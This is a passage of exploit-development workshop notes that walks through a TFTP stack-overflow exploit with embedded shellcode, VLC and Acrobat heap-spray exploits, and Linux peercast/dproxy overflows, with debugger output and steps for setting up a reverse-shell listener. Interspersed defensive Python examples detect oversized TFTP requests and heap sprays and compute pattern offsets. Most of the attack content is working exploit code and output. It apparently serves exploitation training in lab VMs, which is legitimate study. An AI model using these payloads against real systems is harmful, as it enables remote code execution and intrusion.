  903. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  904.  
  905. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  906. prepend += "\x44" # inc esp
  907.  
  908. buf = "\x00\x01" # receive command
  909.  
  910. buf += "\x90" * (256 - len(part2)) # NOPs
  911. buf += part2 # shellcode part 2
  912. buf += struct.pack('<I', eip) # EIP (JMP ESP)
  913. buf += prepend # stack shifter
  914. buf += part1 # shellcode part 1
  915. buf += "\xE9" + struct.pack('<i', -380) # JMP -380
  916. buf += "\x00" # END
  917.  
  918. # print buf
  919.  
  920. # buf = "\x00\x01" # receive command
  921.  
  922. # buf += "A" * 300 + "\x00"
  923.  
  924. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  925.  
  926. try:
  927.     sock.connect((target, port))
  928.     sock.sendall(buf)
  929. except Exception as e:
  930.     sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
  931. finally:
  932.     sock.close()
  933. sys.stderr.write("Sent.\n")
  934.  
  935.  
  936.  
  937. -----------------------------------------------------------------------------------------------------------------
  938.  
  939.  
  940.  
  941.  
  942. How does all of this actually work?
  943.  
  944.  
  945.  
  946.  
  947. Total shellcode length: 315
  948.  
  949. Part1: 150
  950. Part2: 165
  951.  
  952.  
  953. NOPS * (256 - 165)  ->  91 NOPs
  954.  
  955. 91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
  956.  
  957. offset   0 .. 256 : 91 NOPs + 165 bytes of shellcode p2
  958. offset 256 .. 260 : JMP ESP (4 bytes)
  959. offset 260 .. 410 : Stack Shift (-1000) + 150 bytes of shellcode p1
  960. offset 410        : neg jmp -380, which jumps back to the 30 byte mark inside the NOP sled
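As an added defender-side example (not part of the course notes), the following Python 3 inspector parses a TFTP request the way a simple IDS rule would and flags the shape of the payload built above: an RRQ opcode followed by a "filename" that is far longer than any real path, contains non-printable bytes, and carries a run of 0x90 NOPs. The thresholds and both sample packets are constructed for this example; the overflow sample keeps only the size and layout of the lab payload and uses 0xcc placeholders instead of shellcode or addresses.

```python
import struct
from typing import Dict, List

# TFTP opcodes from RFC 1350.
TFTP_OPCODES = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR"}
VALID_MODES = {"netascii", "octet", "mail"}

# Thresholds chosen for this example (assumptions, tune for your network).
MAX_SANE_FILENAME = 128   # real TFTP filenames are short paths
MIN_NOP_RUN = 16          # a run of 0x90 this long never appears in a path


def longest_run(data: bytes, value: int) -> int:
    """Length of the longest run of one byte value in data."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def inspect_tftp_request(packet: bytes) -> Dict[str, object]:
    """Parse a TFTP packet and return opcode, filename length and indicators.

    Only RRQ (1) and WRQ (2) carry a filename and a mode, both NUL
    terminated, so other opcodes are passed through without string checks.
    """
    indicators: List[str] = []
    if len(packet) < 2:
        return {"opcode": None, "filename_len": 0,
                "indicators": ["truncated header"]}
    opcode = struct.unpack("!H", packet[:2])[0]
    name = b""
    if opcode in (1, 2):
        body = packet[2:]
        name_end = body.find(b"\x00")
        if name_end < 0:
            indicators.append("filename not NUL terminated")
            name = body
        else:
            name = body[:name_end]
            rest = body[name_end + 1:]
            mode_end = rest.find(b"\x00")
            mode = rest[:mode_end] if mode_end >= 0 else rest
            if mode.decode("ascii", "replace").lower() not in VALID_MODES:
                indicators.append("unknown transfer mode")
        if len(name) > MAX_SANE_FILENAME:
            indicators.append("oversized filename")
        if any(b < 0x20 or b > 0x7E for b in name):
            indicators.append("non-printable bytes in filename")
        if longest_run(name, 0x90) >= MIN_NOP_RUN:
            indicators.append("NOP sled")
    return {
        "opcode": TFTP_OPCODES.get(opcode, "UNKNOWN"),
        "filename_len": len(name),
        "indicators": indicators,
    }


def is_suspicious(packet: bytes) -> bool:
    """True when the inspector raised at least one indicator."""
    return bool(inspect_tftp_request(packet)["indicators"])


# Constructed samples. The second mirrors only the shape of the lab payload:
# opcode 1, 91 NOPs, then 331 placeholder bytes standing in for the
# 165 + 4 + 7 + 150 + 5 bytes of shellcode, address, shifter and jump,
# and the terminating NUL. No real shellcode or addresses are included.
BENIGN_RRQ = b"\x00\x01" + b"pxelinux.cfg/default\x00" + b"octet\x00"
OVERFLOW_RRQ = b"\x00\x01" + b"\x90" * 91 + b"\xcc" * 331 + b"\x00"

if __name__ == "__main__":
    for label, pkt in (("benign", BENIGN_RRQ), ("overflow", OVERFLOW_RRQ)):
        print(label, inspect_tftp_request(pkt))
```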
  961.  
  962.  
  963.  
  964. ############################
  965. # Lab 3: Browsers Exploits #
  966. ############################
  967.  
  968. ---------------------------Type This-----------------------------------
  969.  
  970. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab3\ffvlc_skeleton
  971. -----------------------------------------------------------------------
  972.  
  973. Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
  974. rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000
  975.  
  976. <object id=quicktime clsid="999-999999-99-99999">
  977. <param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
  978. </object>
  979.  
  980. var buf = "";
  981. for(i = 0; i < 50000; i++)
  982.     buf += "A";
  983. var myobject = document.getElementById("quicktime");
  984. myobject.url = buf;
  985.  
  986. YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!
  987.  
  988. - Browsers (Flash)
  989. - PDF
  990. - MS Office / OOo
  991.  
  992. VLC smb:// exploit
  993. ------------------
  994.  
  995. EXPLOIT VECTOR
  996.  
  997. smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
  998.  
  999. Exploit Scripts
  1000. - ffvlc
  1001.  
  1002. ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
  1003.  
  1004. perl daemon.pl vlc0.html
  1005.  
  1006. ON YOUR Strategicsec-XP-ED-Target-VM VM, START FIREFOX
  1007. Browse to http://your_host_ip_address:8080/
  1008.  
  1009. vlc0.html
  1010. ---------
  1011. <script>
  1012. var buf = "";
  1013. for(i = 0; i < 1250; i++)
  1014.     buf += unescape("%41%41%41%41");
  1015. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  1016. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  1017. </script>
  1018.  
  1019. vlc1.html
  1020. ---------
  1021. <script>
  1022.  
  1023. // shellcode created in heap memory
  1024. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  1025.  
  1026. // 800K block of NOPS
  1027. var nop = unescape("%u9090%u9090"); // 4 NOPS
  1028. while(nop.length < 0xc0000) {
  1029.     nop += nop;
  1030. }
  1031.  
  1032. // spray the heap with NOP+shellcode
  1033. var memory = new Array();
  1034. for(i = 0; i < 50; i++) {
  1035.     memory[i] = nop + shellcode;
  1036. }
  1037.  
  1038. // build the exploit payload
  1039. var buf = "";
  1040. for(i = 0; i < 1250; i++)
  1041.     buf += unescape("%41%41%41%41");
  1042. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  1043.  
  1044. // trigger the exploit
  1045. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  1046. </script>
  1047.  
  1048. ---------------------------Type This-----------------------------------
  1049.  
  1050. perl daemon.pl vlc1.html
  1051. -----------------------------------------------------------------------
  1052.  
  1053. Search for where our NOPS+shellcode lies in the heap
  1054.  
  1055. s 0 l fffffff 90 90 90 90 cc cc cc cc
  1056.  
  1057. 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
  1058. 03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1059. 040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1060. 043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1061. 046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1062. 049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1063. 04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1064. 04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1065. 052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1066. 055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1067. 058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1068. 05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1069. 05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1070. 061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1071. 064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1072. 067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1073. 06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1074.  
  1075. Edit vlc2.html
  1076. replace %41%41%41%41 with %07%07%07%07
  1077.  
  1078. (928.fd0): Break instruction exception - code 80000003 (first chance)
  1079. eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
  1080. eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
  1081. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1082. 07100000 cc int 3
  1083. 0:019> u
  1084. 07100000 cc int 3
  1085. 07100001 cc int 3
  1086. 07100002 cc int 3
  1087. 07100003 cc int 3
  1088. 07100004 cc int 3
  1089. 07100005 cc int 3
  1090. 07100006 cc int 3
  1091. 07100007 cc int 3
  1092.  
  1093. Create vlc3.html (Copy vlc2.html to vlc3.html)
  1094. ----------------------------------------------
  1095. Win32 Reverse Shell
  1096. - no restricted characters
  1097. - Encoder NONE
  1098. - use the Javascript encoded payload generated by msfweb
  1099.  
  1100.  
  1101.  
  1102.  
  1103. #######################
  1104. # Lab 4: PDF EXPLOITS #
  1105. #######################
  1106.  
  1107. ---------------------------Type This-----------------------------------
  1108.  
  1109. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab4\adobe_mnp_skeleton
  1110. -----------------------------------------------------------------------
  1111.  
  1112. Acrobat Media newPlayer exploit
  1113. -------------------------------
  1114.  
  1115. Use-after-free bug
  1116.  
  1117. Exploit scripts are online at 172.16.0.100
  1118. - adobe_mnp
  1119.  
  1120. Download these scripts on your Strategicsec-XP-ED-Target-VM VM itself.
  1121.  
  1122.  
  1123. mnp0.pdf
  1124.  
  1125. - Open up acrobat reader
  1126. - WinDBG
  1127. - F6 attach to AcroRd32.exe
  1128. - g to Go
  1129.  
  1130. EIP = 41414141
  1131.  
  1132. Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
  1133.  
  1134. mnp1.pdf
  1135.  
  1136. All we are doing is changing EIP to 0c0c0c0c.
  1137. There is no heap spray in this one.
  1138.  
  1139. This exception may be expected and handled.
  1140. eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
  1141. eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
  1142. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
  1143. 0c0c0c0c ?? ???
  1144.  
  1145. We know we get EIP control
  1146.  
  1147. mnp2.pdf
  1148.  
  1149. Put in the heap spray.
  1150.  
  1151. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  1152.  
  1153. var nops = unescape("%u9090%u9090");
  1154.  
  1155. while(nops.length <= 32768)
  1156.     nops += nops;
  1157. nops = nops.substring(0,32768 - shellcode.length);
  1158.  
  1159. memory = new Array();
  1160.  
  1161. for(i = 0; i < 1500; i++) {
  1162.     memory[i] = nops + shellcode;
  1163. }
  1164.  
  1165. 1500 NOP+shellcode blocks of 32K NOPs each
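Both spray scripts on this page (vlc1.html above and the mnp2.pdf JavaScript here) share the same three building blocks: a NOP string made with unescape("%u9090..."), a loop that doubles it until a size threshold, and a loop that copies NOPs+shellcode into many array slots. The following Python 3 heuristic, added here as a defender-side example and not part of the course material, looks for those three blocks and estimates the spray footprint from the threshold and block count (a lower bound, since JS strings are UTF-16 and the doubling loop overshoots). The regular expressions and the three sample scripts are constructed for this example.

```python
import re
from typing import Dict

# The three building blocks of the classic spray, as regular expressions:
#  1. a NOP string built from unescape("%u9090...") (UTF-16 units)
#  2. a loop that doubles that string until it passes a size threshold
#  3. a loop that stores NOPs+shellcode into many array slots
NOP_LITERAL = re.compile(r'unescape\(\s*"((?:%u9090)+)"\s*\)')
DOUBLE_LOOP = re.compile(
    r"while\s*\(\s*(\w+)\.length\s*<=?\s*(0x[0-9a-fA-F]+|\d+)\s*\)"
    r"\s*\{?\s*\1\s*\+=\s*\1\s*;"
)
SPRAY_LOOP = re.compile(
    r"for\s*\(\s*\w+\s*=\s*0\s*;\s*\w+\s*<\s*(\d+)\s*;[^)]*\)"
    r"\s*\{?\s*\w+\[\w+\]\s*=\s*\w+\s*\+\s*\w+\s*;"
)


def parse_js_int(text: str) -> int:
    """Parse a JavaScript integer literal written in decimal or 0x hex."""
    return int(text, 16) if text.lower().startswith("0x") else int(text)


def heap_spray_indicators(script: str) -> Dict[str, object]:
    """Report which spray building blocks a script contains.

    estimated_bytes is blocks * threshold (UTF-16 units) * 2 bytes; it is a
    lower bound because the doubling loop stops only after the threshold.
    """
    nop = NOP_LITERAL.search(script)
    dbl = DOUBLE_LOOP.search(script)
    spray = SPRAY_LOOP.search(script)
    estimate = 0
    if dbl and spray:
        estimate = int(spray.group(1)) * parse_js_int(dbl.group(2)) * 2
    return {
        "nop_literal": nop is not None,
        "doubling_loop": dbl is not None,
        "spray_loop": spray is not None,
        "estimated_bytes": estimate,
    }


def is_heap_spray(script: str) -> bool:
    """True only when all three building blocks are present."""
    r = heap_spray_indicators(script)
    return bool(r["nop_literal"] and r["doubling_loop"] and r["spray_loop"])


# Constructed samples shaped like the two lab scripts (the shellcode is
# int3 placeholders, as in the lab) plus one ordinary page for comparison.
VLC_STYLE = """
var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc");
var nop = unescape("%u9090%u9090");
while(nop.length < 0xc0000) {
    nop += nop;
}
var memory = new Array();
for(i = 0; i < 50; i++) {
    memory[i] = nop + shellcode;
}
"""
ACROBAT_STYLE = """
var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc");
var nops = unescape("%u9090%u9090");
while(nops.length <= 32768)
    nops += nops;
nops = nops.substring(0, 32768 - shellcode.length);
memory = new Array();
for(i = 0; i < 1500; i++) {
    memory[i] = nops + shellcode;
}
"""
ORDINARY = """
var items = [];
for (i = 0; i < 10; i++) {
    items[i] = "row " + i;
}
var pad = "";
while (pad.length < 8) { pad += " "; }
"""

if __name__ == "__main__":
    for label, js in (("vlc", VLC_STYLE), ("acrobat", ACROBAT_STYLE),
                      ("ordinary", ORDINARY)):
        print(label, heap_spray_indicators(js))
```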
  1166.  
  1167. We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
  1168.  
  1169. We want to see what led to the crash.
  1170.  
  1171. EIP is invalid, so we can't disassemble around EIP
  1172.  
  1173. We need to trace the function that called us and crashed.
  1174. - STACK TRACE
  1175. - Dumps all the frames from the top of the stack.
  1176. - show you the series of calls that led up to the crash.
  1177. - we will analyze the topmost function on the frame.
  1178.  
  1179. WinDBG - stack trace - "k" command
  1180.  
  1181. 0:000> k
  1182. ChildEBP RetAddr
  1183. WARNING: Frame IP not in any known module. Following frames may be wrong.
  1184. 0013fb34 2d843117 0x90909090
  1185. 0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
  1186. 0013fbdc 23825d8c EScript!PlugInMain+0x25584
  1187. 0013fc74 238257e2 EScript!PlugInMain+0x249dc
  1188. 0013fca4 238543c5 EScript!PlugInMain+0x24432
  1189. 0013fd04 00a78de1 EScript!PlugInMain+0x53015
  1190. 0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
  1191. 0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
  1192. 0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
  1193. 0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
  1194. 0013fe24 00a323b4 USER32!DispatchMessageW+0xf
  1195. 0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
  1196. 0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
  1197. 0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
  1198. 0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
  1199. 0013ffc0 7c817067 AcroRd32+0x4004
  1200. 0013fff0 00000000 kernel32!BaseProcessStart+0x23
  1201.  
  1202. 2d843117 -- the return address that we would have returned to, if we didn't crash.
  1203. A few bytes before 2d843117 (e.g. at 2d843117-2) there should be a CALL instruction.
  1204.  
  1205. u 2d843117
  1206. u 2d843117-2
  1207. u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
  1208. u 2d843117-4
  1209.  
  1210. 0:000> u 2d843117-3
  1211. Multimedia!PlugInMain+0x41b66:
  1212. 2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
  1213. 2d843117 6a00 push 0
  1214. 2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
  1215. 2d84311e 56 push esi
  1216. 2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
  1217. 2d843124 83c40c add esp,0Ch
  1218. 2d843127 66b80100 mov ax,1
  1219. 2d84312b 5e pop esi
  1220.  
  1221. We control EDX
  1222. edx=0c0c0c0c
  1223.  
  1224. call [edx+4] = call [0c0c0c10]
  1225. dd edx+4
  1226.  
  1227. 0:000> dd edx+4
  1228. 0c0c0c10 90909090 90909090 90909090 90909090
  1229. 0c0c0c20 90909090 90909090 90909090 90909090
  1230.  
  1231. 0:000> u 2d843117-7
  1232. Multimedia!PlugInMain+0x41b62:
  1233. 2d843110 8b10 mov edx,dword ptr [eax]
  1234. 2d843112 8bc8 mov ecx,eax
  1235. 2d843114 ff5204 call dword ptr [edx+4]
  1236.  
  1237. dd eax
  1238.  
  1239. 0:000> dd eax
  1240. 02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
  1241. 02e2d690 42424242 42424242 42424242 42424242
  1242. 02e2d6a0 42424242 42424242 42424242 42424242
  1243. 02e2d6b0 42424242 42424242 42424242 42424242
  1244. 02e2d6c0 42424242 42424242 00000000 00000000
  1245.  
  1246. mnp3.pdf
  1247.  
  1248. change the NOPs 90909090 to 0c0c0c0c
  1249.  
  1250. mov edx, [eax]
  1251. call [edx+4]
  1252.  
  1253. edx = 0c0c0c0c
  1254. edx+4 = 0c0c0c10
  1255. contents at edx+4 will also be "0c0c0c0c"
  1256.  
  1257. EIP will jump to 0c0c0c0c
  1258.  
  1259. and...
  1260.  
  1261. 0:000> u 0c0c0c0c
  1262. *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
  1263. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
  1264. 0c0c0c0c 0c0c or al,0Ch
  1265. 0c0c0c0e 0c0c or al,0Ch
  1266. 0c0c0c10 0c0c or al,0Ch
  1267. 0c0c0c12 0c0c or al,0Ch
  1268. 0c0c0c14 0c0c or al,0Ch
  1269.  
  1270.  
  1271. ----------------------------------------------------------------------------------------------------------------
  1272.  
  1273. ##################
  1274. # Linux Exploits #
  1275. ##################
  1276.  
  1277. The target virtual machine for these labs can be downloaded from here:
  1278. https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip
  1279. root: exploitlab
  1280. user: exploitlab
  1281. pass: exploitlab
  1282.  
  1283.  
  1284.  
  1285. The attack scripts can be downloaded from here:
  1286. https://s3.amazonaws.com/secureninja/files/peercast_skel.zip
  1287. https://s3.amazonaws.com/secureninja/files/dproxy.zip
  1288. https://s3.amazonaws.com/secureninja/files/asterisk.zip
  1289.  
  1290.  
  1291. ######################################
  1292. # Lab 1: Simple Linux Stack Overflow #
  1293. ######################################
  1294. Login to the asterisk VM with the username/password of (exploitlab/exploitlab)
  1295.  
  1296. ---------------------------Type This-----------------------------------
  1297.  
  1298. cat victim1.c
  1299. gcc victim1.c -o victim1
  1300. ./victim1 AAAAAAAAAAAAAAAAAAA
  1301. ./victim1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  1302.  
  1303.  
  1304.  
  1305. gdb -core core.xxxx
  1306. info registers
  1307. x/64x $esp
  1308. quit
  1309.  
  1310.  
  1311. /usr/local/sbin/peercast
  1312.  
  1313. -open peercast1.py on the XP attack VM-
  1314. python peercast1.py | nc asterisk-vm-ip 7144
  1315.  
  1316. gdb -core core.xxxx
  1317. info registers
  1318. x/64x $esp
  1319. quit
  1320.  
  1321.  
  1322.  
  1323. /usr/local/sbin/peercast
  1324.  
  1325. -open peercast2.py-
  1326. python peercast2.py | nc asterisk-vm-ip 7144
  1327.  
  1328. gdb -core core.xxxx
  1329. info registers
  1330. x/64x $esp
  1331. quit
  1332.  
  1333.  
  1334.  
  1335.  
  1336.  
  1337. - SSH into the Ubuntu Host (strategicsec:strategicsec) -
  1338. cd /home/strategicsec/toolz/metasploit/tools/exploit
  1339.  
  1340. Now we will run the pattern offset with ruby:
  1341.  
  1342. ruby pattern_offset.rb 42306142
  1343.  
  1344. and
  1345.  
  1346. ruby pattern_offset.rb 61423161
  1347. -----------------------------------------------------------------------
  1348.  
  1349. Distance to EIP is 780
  1350. Relative position of ESP 784
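The two offsets above come from looking up the crashed register values inside Metasploit's cyclic pattern. As an added example (not the course's own tool), here is a Python 3 reimplementation of pattern_create / pattern_offset, so the same crash-triage step can be checked without Metasploit: the pattern is built from unique "Aa0Aa1..." triplets, and a dword read from the debugger is a little-endian value whose bytes are reversed before the search. The test values are the ones from the peercast core dump above.

```python
import string
import struct
from typing import Optional

# pattern_create.rb builds "Aa0Aa1Aa2...Aa9Ab0...Az9Ba0...": every 3-byte
# triplet is unique, so any 4 bytes read from a register identify where in
# the input they came from, up to 26*26*10*3 = 20280 bytes.
DEFAULT_LENGTH = 26 * 26 * 10 * 3


def pattern_create(length: int = DEFAULT_LENGTH) -> str:
    """Cyclic pattern of the given length (same sequence as pattern_create.rb)."""
    chunks = []
    total = 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(value: str, length: int = DEFAULT_LENGTH) -> Optional[int]:
    """Offset of a register value inside the pattern, or None if absent.

    value is either the 4 characters themselves ("Ba0B") or the 8 hex digits
    shown by the debugger ("42306142"). A hex value is a little-endian dword,
    so its bytes are reversed before searching, as pattern_offset.rb does.
    """
    if len(value) == 8 and all(c in string.hexdigits for c in value):
        needle = struct.pack("<I", int(value, 16)).decode("latin-1")
    else:
        needle = value
    pos = pattern_create(length).find(needle)
    return pos if pos >= 0 else None


if __name__ == "__main__":
    # The two values from the peercast crash above.
    print("EIP offset:", pattern_offset("42306142"))  # 780
    print("ESP offset:", pattern_offset("61423161"))  # 784
```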
  1351.  
  1352. Now to find a good JMP ESP address with msfelfscan
  1353.  
  1354. ---------------------------Type This-----------------------------------
  1355.  
  1356. cd /home/strategicsec/toolz/metasploit/
  1357. ./msfelfscan -j ESP binaries/peercast_binary
  1358. -----------------------------------------------------------------------
  1359.  
  1360. 0x0808fb57 jmp esp <----- we will use this one!
  1361. 0x0808fcc7 jmp esp
  1362. 0x0808ffff jmp esp
  1363. 0x08090057 jmp esp <----- we can't use this one.
  1364. 0x080901df jmp esp
  1365.  
  1366.  
  1367. Now open and edit peercast3.py in notepad++ on our XP Host machine.
  1368. pad_lenth = the distance to EIP
  1369. ret_address = the jmp esp we are using
  1370.  
  1371. ---------------------------Type This-----------------------------------
  1372.  
  1373. python peercast3.py | nc asterisk-vm-ip 7144
  1374.  
  1375. gdb -core core.xxxx
  1376. info registers
  1377. x/64x $eip
  1378. x/10i $eip
  1379. quit
  1380. -----------------------------------------------------------------------
  1381.  
  1382. Open peercast4.py in Notepad++ and replace the \xCC with our msf shellcode
  1383.  
  1384. Linux IA32 Reverse Shell
  1385. LHOST (Listening Host) – the IP of your XP host machine ipconfig /all
  1386. LPORT (Listening Port) – choose a port to run your listener on
  1387. Encoder: Alpha2
  1388.  
  1389. ---------------------------Type This-----------------------------------
  1390.  
  1391. nc -l -p 4321
  1392. python peercast4.py | nc asterisk-vm-ip 7144
  1393. -----------------------------------------------------------------------
  1394.  
  1395. ##################################################################
  1396. # Lab 2: Dealing with a lack of space for your shellcode problem #
  1397. ##################################################################
  1398.  
  1399. DPROXY EXPLOIT - DNS PROXY
  1400. --------------------------
  1401.  
  1402. SSH into your Asterisk VM as root
  1403. root / asterisk
  1404.  
  1405. Start dproxy
  1406. /usr/local/sbin/dproxy
  1407.  
  1408.  
  1409. DNS runs on UDP port 53,
  1410. so we will use netcat's UDP mode (-u) for the transport.
  1411.  
  1412. ---------------------------Type This-----------------------------------
  1413.  
  1414. python dproxy1.py | nc -u asterisk-vm-ip 53
  1415.  
  1416. GDB COMMANDS
  1417.  
  1418. gdb -core core.9999 -- load core files
  1419. info registers -- inspect registers
  1420. x/64x $reg -- examine memory at a particular register
  1421. x/64x $esp -- examine memory at ESP
  1422. q -- quit
  1423. x/10i $eip -- disassemble 10 instructions beginning at EIP
  1424.  
  1425. python dproxy1.py | nc -u 192.168.128.140 53
  1426.  
  1427. gdb -core core.8888
  1428.  
  1429. (gdb) info registers
  1430. -----------------------------------------------------------------------
  1431.  
  1432. eax 0xbf9c8c40 0xbf9c8c40
  1433. ecx 0x184f 0x184f
  1434. edx 0xbf9c7da8 0xbf9c7da8
  1435. ebx 0x41414141 0x41414141
  1436. esp 0xbf9c7c00 0xbf9c7c00
  1437. ebp 0x41414141 0x41414141
  1438. esi 0x41414141 0x41414141
  1439. edi 0xbf9c8c40 0xbf9c8c40
  1440. eip 0x41414141 0x41414141
  1441.  
  1442. ---------------------------Type This-----------------------------------
  1443. (gdb) x/64x $esp
  1444. -----------------------------------------------------------------------
  1445.  
  1446. 0xbf9c7c00: 0x41414141 0x41414141 0x41414141 0x41414141
  1447. 0xbf9c7c10: 0x41414141 0x41414141 0x41414141 0x41414141
  1448. 0xbf9c7c20: 0x41414141 0x41414141 0x41414141 0x2e414141
  1449. 0xbf9c7c30: 0x41414141 0x41414141 0x41414141 0x41414141
  1450. 0xbf9c7c40: 0x41414141 0x41414141 0x41414141 0x41414141
  1451. 0xbf9c7c50: 0x41414141 0x41414141 0x41414141 0x41414141
  1452. 0xbf9c7c60: 0x41414141 0x41414141 0x41414141 0x41414141
  1453. 0xbf9c7c70: 0x41412e41 0x41414141 0x41414141 0x41414141
  1454. 0xbf9c7c80: 0x41414141 0x41414141 0x41414141 0x41414141
  1455. 0xbf9c7c90: 0x41414141 0x41414141 0x41414141 0x41414141
  1456. 0xbf9c7ca0: 0x41414141 0x41414141 0x41414141 0x41414141
  1457. 0xbf9c7cb0: 0x2e414141 0x41414141 0x41414141 0x41414141
  1458. 0xbf9c7cc0: 0x41414141 0x41414141 0x41414141 0x41414141
  1459. 0xbf9c7cd0: 0x41414141 0x41414141 0x41414141 0x41414141
  1460. 0xbf9c7ce0: 0x41414141 0x41414141 0x41414141 0x41414141
  1461. 0xbf9c7cf0: 0x41414141 0x41412e41 0x41414141 0x41414141
  1462.  
  1463. PATTERN
  1464.  
  1465. ---------------------------Type This-----------------------------------
  1466.  
  1467. python dproxy2.py | nc -u 192.168.128.140 53
  1468.  
  1469. (gdb) info registers
  1470. -----------------------------------------------------------------------
  1471.  
  1472. eax 0xbf9c8c40 0xbf9c8c40
  1473. ecx 0x184f 0x184f
